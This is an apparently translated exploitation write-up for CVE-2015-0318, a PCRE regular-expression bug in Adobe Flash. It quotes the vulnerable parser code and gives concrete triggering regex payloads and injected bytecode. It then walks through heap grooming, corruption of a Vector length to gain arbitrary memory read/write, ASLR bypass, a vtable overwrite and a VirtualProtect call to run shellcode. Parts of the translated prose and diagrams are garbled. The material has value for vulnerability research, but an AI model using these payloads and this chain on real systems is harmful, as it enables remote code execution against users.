The method of using PCRE regular-Expression Vulnerability CVE-2015-0318 in Flash
0x00 Preface
Issue 199/PSIRT-3161/CVE-2015-0318
Brief Introduction: The PCRE Regular Expression parsing engine used by Flash
Note: Obviously, this engine has a vulnerability. You can see the vulnerability information on the above issue page.
0x01 background
/* For \c, a following letter is upper-cased; then the 0x40 bit is flipped.This coding is ASCII-specific, but then the whole concept of \cx isASCII-specific. (However, an EBCDIC equivalent has now been added.) */case 'c': <---- There’s no check to see if we’re in UTF8 modec = *(++ptr); <---- This could be part of a multibyte unicode characterif (c == 0){ *errorcodeptr = ERR2; break;}#ifndef EBCDIC /* ASCII coding */ if (c >= 'a' && c <= 'z') c -= 32; c ^= 0x40;#else /* EBCDIC coding */ if (c >= 'a' && c <= 'z') c += 64; c ^= 0xC0;#endif break;
Here is the result when we match the Escape Character \ c (Matching 1 ASCII string,: ANSI character) with a multi-byte UTF-8 word, we can simply use "\ c \ xd0 \ x80 +" to trigger a bug, as shown below:
\c?+(?1)
The following bytecode is generated after compilation:
0000 5d0009 93 BRA [9]0003 1bc290 27 CHAR ['\xc2\x90']0006 201b 32 PLUS ['\x1b']0008 80 128 INVALID0009 540009 84 KET [9]000c 00 0 END
Obviously there is something wrong here, but the problem is how to turn this invalid bytecode into any code execution. Unfortunately, if we compare this invalid bytecode, the result is that the matching fails and then exits the matching process without any other action.
However, there is another hope that pcre_compile.cpp provides some additional options. I am using find_brackets, which will iterate from the current bytecode to the end, and there is a relatively loose default case: switch case default: Block), this case will locate (and fill in an offset to) an ordered group, therefore, it may cause some strange memory corruption or make the PCRE bytecode different from the general bytecode execution.
So let's look at this example and add a backend reference:
\c?0?4+(?1)
We can see this line, 'C' is set to invalid operation code: 0x80:
/* Add in the fixed length from the table */code += _pcre_OP_lengths;
Now, _ pcre_OP_lengths is a global array, and the offset 0x80 slightly crosses the end of the array. This is very convenient, because it is located in front of a set of string arrays that will be used for internationalization (both on Windows and Linux ). In each Flash version, the obtained offset is 110 (obviously longer than the length of the valid operation code), so if we can modify the heap, then we can move the code pointer from the allocated bytecode cache to the data we control. We only need to repeat the operation and let find_bracket match the bytecode to the cache we need. Then we can hope for it and let it help us execute malicious code.
We encountered a small problem: when the byte code is invalid, the matching process will exit. Solution: You can wrap them in parentheses to make them an optional group:
(\c?0?4+)?(?2)
By reasonably arranging cache for group 2, we can successfully compile the compiler:
LEGITIMATE HEAP BUFFER0000 5d001b 93 BRA [27]0003 66 102 BRAZERO 0004 5e000b0001 94 CBRA [11, 1]0009 1bc290 27 CHAR ['\xc2\x90']000c 201b 32 PLUS ['\x1b']000e 80 128 INVALID 000f 54000b 84 KET [11]0012 5c0006 92 ONCE [6]0015 510083 81 RECURSE [131] <---- this 131 is the bytecode index to recurse to (131 == 0x83, at the start of our groomed heap buffer)0018 540006 84 KET [6]001b 54001b 84 KET [27]001e 00 0 END …GROOMED HEAP BUFFER0083 5e00880002 94 CBRA [136, 2]0088 540088 84 KET [136]
When we execute this regular expression, everything looks smooth, because the path we need to execute is:
0000 5d001b 93 BRA [27]0003 66 102 BRAZERO 0004 5e000b0001 94 CBRA [11, 1]0009 1bc290 27 CHAR ['\xc2\x90'] <---- Fail, backtrack0015 510083 81 RECURSE [131] 0083 5e00880002 94 CBRA [136, 2] <---- Now executing inside our groomed heap buffer0088 540088 84 KET [136]0018 540006 84 KET [6]001b 54001b 84 KET [27]001e 00 0 END
So now we can happily insert any regular expression bytecode into our CBRA and KET in the adjusted heap buffer.
The PCRE bytecode interpreter is surprisingly robust, so it took me a long time to find a useful Memory Corruption point. The main memory access code in the interpreter has been checked for validity. If it is not so perfect (but there are still many cross-border read opportunities, but now we need write permissions ), we may have used a cross-border write to make it do more.
This is an interesting piece of code. In the process of processing CBRA, there is an error setting for the number of groups. The Code is as follows (from pcre_exec.cpp, I have done some beautification and removed the debug code)
case OP_CBRA:case OP_SCBRA: number = GET2(ecode, 1 + LINK_SIZE); <---- we control number offset = number << 1;<---- we control offset if (offset < md->offset_max) <---- bounds check that offset within offset_vector { save_offset3 = md->offset_vector[md->offset_end - number]; <---- we control number, so if number is 0, we index at md->offset_end, which is one past the end of the array save_capture_last = md->capture_last; if (ES3_Compatible_Behavior) // clear all matches for groups > than this one { // (we only really need to reset all enclosed groups, but // covering all groups > this is harmless because // we interpret from left to right) savedElems = (offset_top > offset ? offset_top - offset : 2); if (savedElems > frame->XoffsetStackSaveMax) { if (frame->XoffsetStackSave != frame->XoffsetStackSaveStg) { (pcre_free)(frame->XoffsetStackSave); } frame->XoffsetStackSave = (int *)(pcre_malloc)(savedElems * sizeof(int)); if (frame->XoffsetStackSave == NULL) { RRETURN(PCRE_ERROR_NOMEMORY); } frame->XoffsetStackSaveMax = savedElems; } VMPI_memcpy(offsetStackSave, md->offset_vector + offset, (savedElems * sizeof(int))); for (int resetOffset = offset + 2; resetOffset < offset_top; resetOffset++) { md->offset_vector[resetOffset] = -1; } } else { offsetStackSave[1] = md->offset_vector[offset]; offsetStackSave[2] = md->offset_vector[offset + 1]; savedElems = 0; } md->offset_vector[md->offset_end - number] = eptr - md->start_subject; <---- even better, we write the current length of the match there; this is becoming interesting.
Therefore, we can write a DWORD we control into offset_vector. In this case, offset_vector is usually a stack cache allocated in RegExpObject. cpp:
ArrayObject* RegExpObject::_exec(Stringp subject, StIndexableUTF8String& utf8Subject, int startIndex, int& matchIndex, int& matchLen){ AvmAssert(subject != NULL); int ovector[OVECTOR_SIZE]; <-- int results; int subjectLength = utf8Subject.length();
This is not very interesting. a dword we write is useless-I didn't see it, but modern compilers will do variable re-sorting and secure cookies, so this is almost useless. However, we have a simpler method. In this example, we will use more matching groups. The number of these groups is larger than the number of caches to be filled in, in this case, PCRE will allocate a suitable cache on the stack. The space originally allocated on the stack is not large enough, so the program will allocate another piece of memory on the stack to ensure normal operation)
/* If the expression has got more back references than the offsets supplied canhold, we get a temporary chunk of working store to use during the matching.Otherwise, we can use the vector supplied, rounding down its size to a multipleof 3. */ocount = offsetcount - (offsetcount % 3);if (re->top_backref > 0 && re->top_backref >= ocount / 3){ ocount = re->top_backref * 3 + 3; md->offset_vector = (int *)(pcre_malloc)(ocount * sizeof(int)); if (md->offset_vector == NULL) { return PCRE_ERROR_NOMEMORY; } using_temporary_offsets = TRUE; DPRINTF(("Got memory to hold back references\n"));}else{ md->offset_vector = offsets;}md->offset_end = ocount;md->offset_max = (2 * ocount) / 3;md->offset_overflow = FALSE;md->capture_last = -1;
Thumbs up. When the allocation size is greater than 99*4 = 396 bytes, we can control a DWORD after a heap is created. Since we need to write the allocated area, let's look at the Flash heap distributor. It tells us that 504 bytes is the size of the first area we matched accurately, so we need md-> top_backref = 41 to get this number. This is simple, as long as we add a bunch of capture groups and trace references.
(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\c?0?4+)?(?43)
Another problem we will encounter is that Flash does not verify whether the regular expression is compiled successfully. If the first heap allocation fails, find_bracket will not find data that matches the group, therefore, compilation will also fail. This is quite complicated when debugging, so we can add a constant at the beginning so that we can use it to test whether the compilation is successful.
(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\c?0?4+)?(?70))
As we mentioned earlier, we need a heap allocation so that our code is right behind the cache location of the bytecode compiled from the regular expression we provide. For the sake of simplicity, We Will paste the regular expression behind the cache, which is a good number for the Flash heap splitter. The next available unit is 576 bytes, each character is added to 2 bytes.
(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c?0?4*)?(?70))
We need to make more modifications to let this problem affect the current length of the match, so we need a simpler way to control it. We can adjust the first group to match any number of different characters, as shown below:
(c01db33f|(B*)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c?0?4*)?(?70))
Note: In the vulnerability code, we will replace B randomly in the selected characters because Flash caches the compiled regular expression, whether it is successful or not. If our allocation fails, we still need to force it to recompile the regular expression.
Therefore, this means that the initial compilation and processing of the vulnerability has been completed. We already know how to use this cross-border write bytecode payload, which is:
0000 5e00010046 94 CBRA [1, 70]0005 5e00000000 94 CBRA [0, 0]000a 6d 109 ACCEPT
In order to write data successfully, the final ACCEPT is required. We need to make group 0 a match. ACCEPT will forcibly complete this action, and the advantage is that it uses the least bytecode.
Now, if you look at it all the way, you may think it is really troublesome. In many cases, this is almost the beginning of the vulnerability: we control the allocation size, and we write the length of our matching item to the end of it, although overwriting a pointer is quite annoying. But the good news is that there is a solution in Flash, Which is annoying: Vector. We can allocate such an object of any size, and its initial DWORD is a length field. When we rewrite this length field, we will not have any obstacles on the road to any read/write, and it will also be a very stable vulnerability code.
0x01 compile regular expression
First, we need to allocate a large set of 504 buffers (the same as the regular expression we compiled), and then fill it with our malicious bytecode:
_______________________________________________________________________________________|exploit-bytecode------------|exploit-bytecode------------|exploit-bytecode------------|`````````````````````````````````````````````````````````````````````````````
Then we release the second buffer so that we can keep the next well-sized "gap", and the gap here is easily reused by the Flash heap distributor. It means that the allocation is so large that the allocation of space on the heap may take precedence)
_______________________________________________________________________________________|exploit-bytecode------------|FREE |exploit-bytecode------------|`````````````````````````````````````````````````````````````````````````````
So when we try to compile our regular expression, we will allocate it almost every time. In this gap, we will just fill in our malicious bytecode, therefore, we construct a bytecode that closely follows the buffer.
_______________________________________________________________________________________|exploit-bytecode------------|ERCP|metadata|regex-bytecode|exploit-bytecode------------|````````````````````````````````````````````````````````````````````````````
0x02 run the regular expression to destroy the length of the vector
Some tricks are also used here. We want to have a Vector with a size of 0xffffffff. In this way, we can read and write all the memory (Note: It's really not 0x7fffff). We actually created Their allocation size must be 576, that is, the offset_vector size.
_______________________________________________________________________________________|length|vector---------------|length|vector---------------|length|vector---------------|`````````````````````````````````````````````````````````````````````````````
For example:
_______________________________________________________________________________________|FREE |length|vector---------------|length|vector---------------|`````````````````````````````````````````````````````````````````````````````
When the regular expression is executed, the size of the current match (a dword) will be written at the end of the allocated offset_vector, And the length field of the first vector will be destroyed.
_______________________________________________________________________________________|offset_vector---------------|corrupt|vector--------------|length|vector---------------|`````````````````````````````````````````````````````````````````````````````
We only need to increase the size of the first vector by 1 byte. We can use the first vector to completely control the second byte:
_______________________________________________________________________________________|offset_vector---------------|length+1|vector--------------------|vector---------------|`````````````````````````````````````````````````````````````````````````````_______________________________________________________________________________________|offset_vector---------------|length+1|vector---------------|UINT_MAX|vector-----------------------`````````````````````````````````````````````````````````````````````````````
Now we have read and write permissions on the memory addresses of all Flash processes. We can almost declare that Flash is finished. Finally, there is another major problem. We don't know our huge Vector. Where, because all memory operations are based on the cache address.
0x03 where is the broken Vector?
Conveniently, The PCRE code will automatically release the cache for this huge vector before returning the actionscript code. This means that we can find our vector back and find a freelist pointer from the free block after it.
| FREE | ptr | length | vector --- |-| UINT_MAX | vector --- | '\'\'\' \'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\' \'\'\'\'\''''
This pointer will point to the next available block, which is almost our super-large vector. We can check whether it is necessary or not, because the block size is really large, it's safe to gamble. In this way, our relative read/write permissions can be converted to full read/write permissions.
| FREE | ptr | length | vector --- |-| UINT_MAX | vector --- | FREE | ptr |
'\' | ''\'\'\'\'\'\'\'\'\'\'\'\'\'\'\' \'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\'\' \ '\ ^' \ ''' | ___ | \___ | \ ___ | \___ | \ ___ |__ |
0x04 others
The rest is a simple Windows Code read/write tutorial. If you are bored, you can skip this section.
1. Find a module
We bypassed ASLR by locating the Vector, but we don't know where other things are. We need a usable loaded module so that we can use its code. One method is heap injection, but it is not necessary now.
The Memory Page allocated by the FixedAlloc in Flash has a very good structure at the beginning, which contains a static instance that eventually points to a C ++ class. This instance is started in the Flash module, so we can use this to locate the Flash module. For details, see the vulnerability code.
When we have a pointer in the module, we can find all the MZ tags from this pointer, so that we can identify each module and then obtain their export tables, this can be used in the final stage of our vulnerability
2. Overwrite
Now we have bypassed ASLR. If this is a linux vulnerability and there is no RELRO, we only need to overwrite a function pointer in the GOT section, but Windows does not have such a convenient technique, through Reverse Flash files, we finally find a place that can be covered, which is easier than operating on the heap.
If we create another AS class and then instantiate this class, it will be allocated on the heap, and a vtable pointer will also be used to associate functions related to objects. We can create a class with some fixed features and make it easy to find. by querying the heap structure, we can locate this class, in this way, we do not have to risk accessing the uninitialized memory.
3. Execute the code
One useful feature of Flash JIT is that if a parameter is a simple native type, it will be pushed to the original stack (just like a normal native function call ). This means that if we use a large number of uint parameters to overwrite the function pointer, we can control a large native stack space. When the function is called, we can directly drop to a valid program stack.
What we need to do is to call VirtualProtect to mark the page attribute of the Vector as executable, and put it into our Shellcode. It's okay to jump in.
When calling VirtualProtect, you can create a stack space that is large enough by creating useless variables. In this way, the original stack frame of Flash will not be damaged when returned (our fake stack frame will be inserted into the original stack frame center)
4. Return execution stream
After the execution is successful, how can I return Flash to prevent it from crashing? Let's take a look at what we have done to the process. If everything goes well, we only damaged the memory of three dword files, so it is easy to resume execution:
The size of the first vector is increased by 1. The size of the second vector is increased to UINT_MAX, and the function pointer pointing to our function is changed.
When we overwrite the length of the second vector, the first vector will be repaired immediately, and 2 needs to be fixed, because all the memory may be restored during Flash free vector ...... And 3 does not need to be restored, because it will no longer be used.
This means that if we can handle the vulnerability correctly, Flash will hardly see any changes before and after vulnerability execution. Our drop will look like a Hook to the Flash function, after executing our code, it will return to the original Flash function.